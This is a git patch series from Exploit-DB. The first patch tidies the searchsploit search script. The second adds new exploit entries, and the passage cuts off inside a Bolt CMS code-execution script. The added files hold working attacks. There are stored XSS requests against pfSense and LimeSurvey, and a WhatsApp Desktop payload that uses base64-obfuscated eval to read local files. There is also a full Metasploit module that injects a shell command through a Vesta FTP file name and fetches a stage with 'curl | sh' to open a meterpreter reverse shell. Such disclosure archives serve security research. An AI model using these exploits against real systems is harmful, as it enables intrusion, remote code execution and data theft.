From 87fab8631b7aeb229c63e900acc8ae8e35d6a208 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Mon, 6 Apr 2020 13:34:23 +0100 Subject: [PATCH 01/18] Fix apt install of exploitdb-{bin-sploits/papers} --- searchsploit | 123 ++++++++++++++++++++++++++++----------------------- 1 file changed, 68 insertions(+), 55 deletions(-) diff --git a/searchsploit b/searchsploit index a18dff7eb..07e505173 100755 --- a/searchsploit +++ b/searchsploit @@ -1,6 +1,6 @@ #!/bin/bash # Name: SearchSploit - Exploit-DB's CLI search tool -# Version: 4.0.5 (2019-03-27) +# Version: 4.0.6 (2020-04-06) # Written by: Offensive Security, Unix-Ninja, and g0tmi1k # Homepage: https://github.com/offensive-security/exploitdb # Manual: https://www.exploit-db.com/searchsploit @@ -73,34 +73,34 @@ function usage() echo "=========" echo " Options " echo "=========" - echo " -c, --case [Term] Perform a case-sensitive search (Default is inSEnsITiVe)." - echo " -e, --exact [Term] Perform an EXACT match on exploit title (Default is AND) [Implies \"-t\"]." - echo " -h, --help Show this help screen." - echo " -j, --json [Term] Show result in JSON format." - echo " -m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory." - echo " -o, --overflow [Term] Exploit titles are allowed to overflow their columns." - echo " -p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible)." - echo " -t, --title [Term] Search JUST the exploit title (Default is title AND the file's path)." - echo " -u, --update Check for and install any exploitdb package updates (deb or git)." - echo " -w, --www [Term] Show URLs to Exploit-DB.com rather than the local path." - echo " -x, --examine [EDB-ID] Examine (aka opens) the exploit using \$PAGER." - echo " --colour Disable colour highlighting in search results." - echo " --id Display the EDB-ID value rather than local path." - echo " --nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)." + echo " -c, --case [Term] Perform a case-sensitive search (Default is inSEnsITiVe)" + echo " -e, --exact [Term] Perform an EXACT match on exploit title (Default is AND) [Implies \"-t\"]" + echo " -h, --help Show this help screen" + echo " -j, --json [Term] Show result in JSON format" + echo " -m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory" + echo " -o, --overflow [Term] Exploit titles are allowed to overflow their columns" + echo " -p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible)" + echo " -t, --title [Term] Search JUST the exploit title (Default is title AND the file's path)" + echo " -u, --update Check for and install any exploitdb package updates (deb or git)" + echo " -w, --www [Term] Show URLs to Exploit-DB.com rather than the local path" + echo " -x, --examine [EDB-ID] Examine (aka opens) the exploit using \$PAGER" + echo " --colour Disable colour highlighting in search results" + echo " --id Display the EDB-ID value rather than local path" + echo " --nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)" echo " Use \"-v\" (verbose) to try even more combinations" - echo " --exclude=\"term\" Remove values from results. By using \"|\" to separated you can chain multiple values." - echo " e.g. --exclude=\"term1|term2|term3\"." + echo " --exclude=\"term\" Remove values from results. By using \"|\" to separated you can chain multiple values" + echo " e.g. --exclude=\"term1|term2|term3\"" echo "" echo "=======" echo " Notes " echo "=======" - echo " * You can use any number of search terms." - echo " * Search terms are not case-sensitive (by default), and ordering is irrelevant." - echo " * Use '-c' if you wish to reduce results by case-sensitive searching." - echo " * And/Or '-e' if you wish to filter results by using an exact match." - echo " * Use '-t' to exclude the file's path to filter the search results." - echo " * Remove false positives (especially when searching using numbers - i.e. versions)." - echo " * When updating or displaying help, search terms will be ignored." + echo " * You can use any number of search terms" + echo " * Search terms are not case-sensitive (by default), and ordering is irrelevant" + echo " * Use '-c' if you wish to reduce results by case-sensitive searching" + echo " * And/Or '-e' if you wish to filter results by using an exact match" + echo " * Use '-t' to exclude the file's path to filter the search results" + echo " * Remove false positives (especially when searching using numbers - i.e. versions)" + echo " * When updating or displaying help, search terms will be ignored" echo "" exit 2 } @@ -112,7 +112,8 @@ function update() arraylength="${#files_array[@]}" for (( i=0; i<${arraylength}; i++ )); do ## Check to see if we already have the value - [[ "${tmp_package[*]}" =~ "${package_array[${i}]}" ]] && continue + [[ "${tmp_package[*]}" =~ "${package_array[${i}]}" ]] \ + && continue ## Else save all the information tmp_git+=("${git_array[${i}]}") @@ -128,24 +129,24 @@ function update() path="${tmp_path[${i}]}" package="${tmp_package[${i}]}" - # Update from the repos (e.g. Kali) - dpkg -l "${package}" 2>/dev/null >/dev/null + ## Update from the repos (e.g. Kali) + apt-cache search "${package}" 2>/dev/null >/dev/null #dpkg -l "${package}" 2>/dev/null >/dev/null if [[ "$?" == "0" ]]; then updatedeb "${package}" else - # Update from homebrew (e.g. OSX) + ## Update from homebrew (e.g. OSX) brew 2>/dev/null >/dev/null if [[ "$?" == "0" ]]; then - # This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently + ## This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently updatedbrew "${package}" fi - # Update via Git + ## Update via Git updategit "${package}" "${path}" "${git}" fi done - # Done + ## Done exit 6 } @@ -158,11 +159,11 @@ function updatedeb() echo -e "[i] Updating via apt package management (Expect weekly-ish updates): ${package_in}\n" sudo apt update \ - || echo -e "\n[-] Issue with apt update (Please check network connectivity & apt SourcesList values)." 1>&2 + || echo -e "\n[-] Issue with apt update (Please check network connectivity & apt SourcesList values)" 1>&2 sudo apt -y install "${package_in}" \ - || echo -e "\n[-] Issue with apt upgrade." 1>&2 + || echo -e "\n[-] Issue with apt upgrade" 1>&2 - echo -e "\n[*] apt update finished." + echo -e "\n[*] apt update finished" } @@ -171,13 +172,13 @@ function updatedbrew() { package_in="${1}" - echo -e "[i] Updating via brew package management.\n" + echo -e "[i] Updating via brew package management\n" brew update \ - || echo -e "\n[-] Issue with brew update (Please check network connectivity)." 1>&2 + || echo -e "\n[-] Issue with brew update (Please check network connectivity)" 1>&2 brew upgrade "${package_in}" - echo -e "\n[*] Brew update finished." + echo -e "\n[*] Brew update finished" } @@ -232,7 +233,7 @@ function updategit() || sudo git pull -v upstream master fi - echo -e "\n[*] Git update finished." + echo -e "\n[*] Git update finished" echo "[i] Path: ${path_in}/" } @@ -277,7 +278,8 @@ function validterm() function searchsploitout() { ## Make sure there is a value - [ "${software}" = "" ] && return + [ "${software}" = "" ] \ + && return #echo "" 1>&2 @@ -373,6 +375,7 @@ function nmapxml() ;; "[PRODUCT]") ## We have a name, but no version (yet?) e.g. dnsmasq + echo "${software}" software="${input}" ;; "[VERSION]") @@ -395,7 +398,8 @@ function buildterms() ## If we are to use colour ("--colour"), add the values to search for between "or" if [[ "${COLOUR}" -eq 1 ]]; then - [[ "${COLOUR_TAG}" ]] && COLOUR_TAG="${COLOUR_TAG}|" + [[ "${COLOUR_TAG}" ]] \ + && COLOUR_TAG="${COLOUR_TAG}|" COLOUR_TAG="${COLOUR_TAG}${tag_in}" fi @@ -406,7 +410,8 @@ function buildterms() ## Search just the title, NOT the path ("-t"/"-e") else ## If there is already a value, prepend text to get ready - [[ "${AWK_SEARCH}" ]] && AWK_SEARCH="${AWK_SEARCH}/ && ${CASE_TAG_FGREP}(\$3) ~ /" + [[ "${AWK_SEARCH}" ]] \ + && AWK_SEARCH="${AWK_SEARCH}/ && ${CASE_TAG_FGREP}(\$3) ~ /" ## Escape any slashes tag_in="$( echo ${tag_in} | sed 's_/_\\/_g' )" @@ -449,7 +454,7 @@ function findresults() ## EXACT search command ("-e")? if [[ "${EXACT}" -eq 1 ]]; then - buildterms "${TAGS}" + buildterms "${TAGS}" ## or AND search command? else ## For each term @@ -460,7 +465,8 @@ function findresults() ## If we are NOT to use the path name ("-t"/"-e") - [[ "${FILEPATH}" -eq 0 ]] && SEARCH="${SEARCH} | awk -F '[,]' '${CASE_TAG_FGREP}(\$3) ~ /${AWK_SEARCH}/ {print}'" + [[ "${FILEPATH}" -eq 0 ]] \ + && SEARCH="${SEARCH} | awk -F '[,]' '${CASE_TAG_FGREP}(\$3) ~ /${AWK_SEARCH}/ {print}'" ## If we are to use colour ("--colour"), add the value here @@ -470,7 +476,9 @@ function findresults() ## Dynamically set column widths to the current screen size - [[ "${WEBLINK}" -eq 1 ]] && COL2=45 || COL2=$(( ${#path_in} + 21 )) + [[ "${WEBLINK}" -eq 1 ]] \ + && COL2=45 \ + || COL2=$(( ${#path_in} + 21 )) COL1=$(( $( tput cols ) - COL2 - 1 )) @@ -489,7 +497,8 @@ function findresults() ## Remove any terms not wanted from the search - [[ "${EXCLUDE}" ]] && SEARCH="${SEARCH} | grep -vEi '${EXCLUDE}'" + [[ "${EXCLUDE}" ]] \ + && SEARCH="${SEARCH} | grep -vEi '${EXCLUDE}'" ## Magic search Fu @@ -531,7 +540,8 @@ function findresults() ## Display colour highlights ("--colour")? if [[ "${COLOUR_TAG}" ]] && [[ "${JSON}" -eq 0 ]]; then - [[ "${OUTPUT}" ]] && OUTPUT=$( echo -e "${OUTPUT}" | eval ${COLOUR_TAG} ) + [[ "${OUTPUT}" ]] \ + && OUTPUT=$( echo -e "${OUTPUT}" | eval ${COLOUR_TAG} ) fi } @@ -566,7 +576,8 @@ function printresults() ## Show content - [[ "${OUTPUT}" ]] && echo "${OUTPUT}" + [[ "${OUTPUT}" ]] \ + && echo "${OUTPUT}" ## Print footer if in JSON ("--json") @@ -589,11 +600,11 @@ if [[ -f "${HOME}/.searchsploit_rc" ]]; then elif [[ -f "/etc/searchsploit_rc" ]]; then rc_file="/etc/searchsploit_rc" ## Method #1 - File itself -elif [[ -f "$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)/.searchsploit_rc" ]]; then - rc_file="$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)/.searchsploit_rc" +elif [[ -f "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.searchsploit_rc" ]]; then + rc_file="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.searchsploit_rc" ## Method #2 - Symbolic link -elif [[ -f "$(dirname "$(readlink "$0")")/.searchsploit_rc" ]]; then - rc_file="$(dirname "$(readlink "$0")")/.searchsploit_rc" +elif [[ -f "$( dirname "$( readlink "$0" )" )/.searchsploit_rc" ]]; then + rc_file="$( dirname "$( readlink "$0" )" )/.searchsploit_rc" ## Manually specified? elif [[ ! -f "${rc_file}" ]]; then echo "[!] Could not find: rc_file ~ ${rc_file}" @@ -813,11 +824,11 @@ if [[ "${GETPATH}" -eq 1 ]]; then ## Linux (Will require $DISPLAY) if hash xclip 2>/dev/null; then echo -ne "${location}" | xclip -selection clipboard 2>/dev/null - echo "Copied EDB-ID #${edbdb}'s path to the clipboard." + echo "Copied EDB-ID #${edbdb}'s path to the clipboard" ## OSX elif hash pbcopy 2>/dev/null; then echo -ne "${location}" | pbcopy - echo "Copied EDB-ID #${edbdb}'s path to the clipboard." + echo "Copied EDB-ID #${edbdb}'s path to the clipboard" fi fi @@ -879,7 +890,8 @@ TAGS="$( echo ${TAGS} | sed -e 's/^[[:space:]]//' )" ## Print header if in JSON ("--json") -[[ "${JSON}" -eq 1 ]] && printf "{\n\t\"SEARCH\": \"${TAGS}\"" +[[ "${JSON}" -eq 1 ]] \ + && printf "{\n\t\"SEARCH\": \"${TAGS}\"" ## Check for files_*.csv @@ -900,7 +912,8 @@ done ## Print footer if in JSON ("--json") -[[ "${JSON}" -eq 1 ]] && printf "\n}\n" +[[ "${JSON}" -eq 1 ]] \ + && printf "\n}\n" ## Done From 85bef6929fae93d7aed3049ad516fc29467afe3f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 7 Apr 2020 05:02:01 +0000 Subject: [PATCH 02/18] DB: 2020-04-07 17 changes to exploits/shellcodes Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) Frigate 3.36 - Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) Memu Play 7.1.3 - Insecure Folder Permissions Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) Microsoft NET USE win10 - Insufficient Authentication Logic LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit) WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting Bolt CMS 3.7.0 - Authenticated Remote Code Execution LimeSurvey 4.1.11 - 'File Manager' Path Traversal pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting --- exploits/freebsd/webapps/48300.txt | 39 ++++ exploits/multiple/webapps/48294.rb | 239 +++++++++++++++++++++ exploits/multiple/webapps/48295.txt | 42 ++++ exploits/php/webapps/48289.txt | 30 +++ exploits/php/webapps/48296.py | 167 +++++++++++++++ exploits/php/webapps/48297.txt | 18 ++ exploits/windows/dos/48284.py | 35 ++++ exploits/windows/dos/48285.py | 36 ++++ exploits/windows/dos/48286.py | 39 ++++ exploits/windows/dos/48287.py | 26 +++ exploits/windows/dos/48288.py | 23 ++ exploits/windows/dos/48290.py | 24 +++ exploits/windows/dos/48291.py | 22 ++ exploits/windows/dos/48292.txt | 22 ++ exploits/windows/local/48283.txt | 70 +++++++ exploits/windows/local/48293.py | 79 +++++++ exploits/windows/local/48299.txt | 313 ++++++++++++++++++++++++++++ files_exploits.csv | 17 ++ 18 files changed, 1241 insertions(+) create mode 100644 exploits/freebsd/webapps/48300.txt create mode 100755 exploits/multiple/webapps/48294.rb create mode 100644 exploits/multiple/webapps/48295.txt create mode 100644 exploits/php/webapps/48289.txt create mode 100755 exploits/php/webapps/48296.py create mode 100644 exploits/php/webapps/48297.txt create mode 100755 exploits/windows/dos/48284.py create mode 100755 exploits/windows/dos/48285.py create mode 100755 exploits/windows/dos/48286.py create mode 100755 exploits/windows/dos/48287.py create mode 100755 exploits/windows/dos/48288.py create mode 100755 exploits/windows/dos/48290.py create mode 100755 exploits/windows/dos/48291.py create mode 100644 exploits/windows/dos/48292.txt create mode 100644 exploits/windows/local/48283.txt create mode 100755 exploits/windows/local/48293.py create mode 100644 exploits/windows/local/48299.txt diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt new file mode 100644 index 000000000..f485c9955 --- /dev/null +++ b/exploits/freebsd/webapps/48300.txt @@ -0,0 +1,39 @@ +# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.pfsense.org +# Version: PfSense 2.4.4-P3 +# Tested on: FreeBSD 11.2-RELEASE-p10 +# CVE : CVE-2020-11457 + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. +# Vulnerable Parameter : descr + + +# POC +# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. +# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is +# the id of the user containing the payload. + + +POST /system_usermanager.php?act=new HTTP/1.1 +Host: TARGET +Connection: close +Content-Length: 410 +Cache-Control: max-age=0 +Origin: https://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Sec-Fetch-Dest: document +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Referer: https://TARGET/system_usermanager.php?act=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d + +__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save \ No newline at end of file diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb new file mode 100755 index 000000000..53c997d1a --- /dev/null +++ b/exploits/multiple/webapps/48294.rb @@ -0,0 +1,239 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in v-list-user-backups bash script file. + Low privileged authenticated users can execute arbitrary commands under the context of the root user. + + An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. + During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As + result of that backup process, when an attacker try to list existing backups injected payload will be + executed. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], + ['CVE', '2020-10808'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8083, + 'WfsDelay' => 300, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2020", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(8083), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ] + ) + deregister_options('FTPUSER', 'FTPPASS') + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def login + # + # This is very simple login process. Nothing important. + # We will be using cookie and csrf_token across the module so that we are global variable. + # + print_status('Retrieving cookie and csrf token values') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + }) + + if res && res.code == 200 && !res.get_cookies.empty? + @cookie = res.get_cookies + @csrf_token = res.body.scan(//).flatten[0] || '' + if @csrf_token.empty? + fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + print_good('Cookie and CSRF token values successfully retrieved') + + print_status('Authenticating to HTTP Service with given credentials') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + 'cookie' => @cookie, + 'vars_post' => { + 'token' => @csrf_token, + 'user' => username, + 'password' => password + } + }) + + if res && res.code == 302 && !res.get_cookies.empty? + print_good('Successfully authenticated to the HTTP Service') + @cookie = res.get_cookies + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + end + + def is_scheduled_backup_running + res = trigger_scheduled_backup + # + # MORE explaination. + # + if res && res.code == 302 + res = trigger_payload + if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') + return true + else + print_good('It seems scheduled backup is done ..! Triggerring payload <3') + return false + end + else + fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') + end + return false + end + + def trigger_payload + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), + }) + if res && res.code == 200 + res + else + fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') + end + end + + def trigger_scheduled_backup + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), + }) + if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// + res + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + end + + def payload_implant + # + # Our payload will be placed as a file name on FTP service. + # Payload lenght can't be more then 255 and SPACE can't be used because of the + # bug in the backend software. Due to these limitations, I used web delivery method. + # + # When the initial payload executed. It will execute very short perl command, which is going to fetch + # actual python meterpreter first stager and execute it. + # + final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Yet another datastore variable overriding. + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + port_restore = datastore['RPORT'] + datastore['RPORT'] = 21 + datastore['FTPUSER'] = username + datastore['FTPPASS'] = password + + # + # Connecting to the FTP service with same creds as web ui. + # Implanting the very first stage of payload as a empty file. + # + if (not connect_login) + fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') + end + print_good('Successfully authenticated to the FTP service') + + res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") + if res.nil? + fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") + end + print_good('Successfully uploaded the payload as a file name') + disconnect + + # Revert datastore variables. + datastore['RPORT'] = port_restore + datastore['SSL'] = true if ssl_restore + end + + def exploit + start_http_server + payload_implant + login + trigger_scheduled_backup + print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') + while is_scheduled_backup_running == true + print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') + Rex.sleep(30) + end + stop_service + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! Sending 2nd stage of the payload') + second_stage = "python -c \"#{payload.encoded}\"" + send_response(cli, second_stage, {'Content-Type'=>'text/html'}) + end + + def start_http_server + # + # HttpClient and HttpServer use same SSL variable :( + # We don't need a SSL for payload delivery. + # + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("Second payload download URI is #{get_uri}") + # We need that global variable since get_uri keep using SSL from datastore + # We have to get the URI before restoring the SSL. + @second_stage_url = get_uri + datastore['SSL'] = true if ssl_restore + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt new file mode 100644 index 000000000..7e0e139ae --- /dev/null +++ b/exploits/multiple/webapps/48295.txt @@ -0,0 +1,42 @@ +# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting +# Date: 2020-01-21 +# Exploit Author: Gal Weizman +# Vendor Homepage: https://www.whatsapp.com +# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe +# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg +# Version: 0.3.9308 +# Tested On: Mac OS, Windows, iPhone +# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 + +// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) +// step 2: open devtools and search in all files "t=e.id" +// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found +// step 4: paste "https://example.com" in the text box and hit "Enter" +// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" + +var payload = `(async function() { + alert(navigator.userAgent); + (async function() { + // read "file:///C:/windows/system32/drivers/etc/hosts" content + const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); + const t = await r.text(); + alert(t); + }()) +}())`; + +payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; + +e.__x_matchedText = payload; + +e.__x_body = ` + Innocent text + + ${payload} + + More Innocent text +`; + +// step 6: press F8 in order for the execution to continue +// result: a message should be sent to the victim that once is clicked will execute the payload above + +// further information: https://github.com/weizman/CVE-2019-18426 \ No newline at end of file diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt new file mode 100644 index 000000000..213de9367 --- /dev/null +++ b/exploits/php/webapps/48289.txt @@ -0,0 +1,30 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11456 + +# Vulnerability Details +Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. +Vulnerable Parameter : "title" + + +# POC +POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 +Host: TARGET +Content-Length: 374 +Cache-Control: max-age=0 +Origin: http://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D +Connection: close + +YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0= \ No newline at end of file diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py new file mode 100755 index 000000000..9b3401a53 --- /dev/null +++ b/exploits/php/webapps/48296.py @@ -0,0 +1,167 @@ +# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution +# Date: 2020-04-05 +# Exploit Author: r3m0t3nu11 +# Vendor Homepage: https://bolt.cm/ +# Software Link: https://bolt.cm/ +# Version: up to date and 6.x +# Tested on: Linux +# CVE : not-yet-0day + +# last version + +# p0c + + +#!/usr/bin/python + +import requests +import sys +import warnings +import re +import os +from bs4 import BeautifulSoup +from colorama import init +from termcolor import colored + +init() + +print(colored(''' + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ + ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ +▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ +▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ +▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ +▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ +▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ +▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ +▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ + ▀▀▀▀▀▀▀▀▀▀▀ + +Pre Auth rce with low credintanl +By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) + + + +if len(sys.argv) != 4: + print((len(sys.argv))) + print((colored("[~] Usage : ./bolt.py url username password","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = 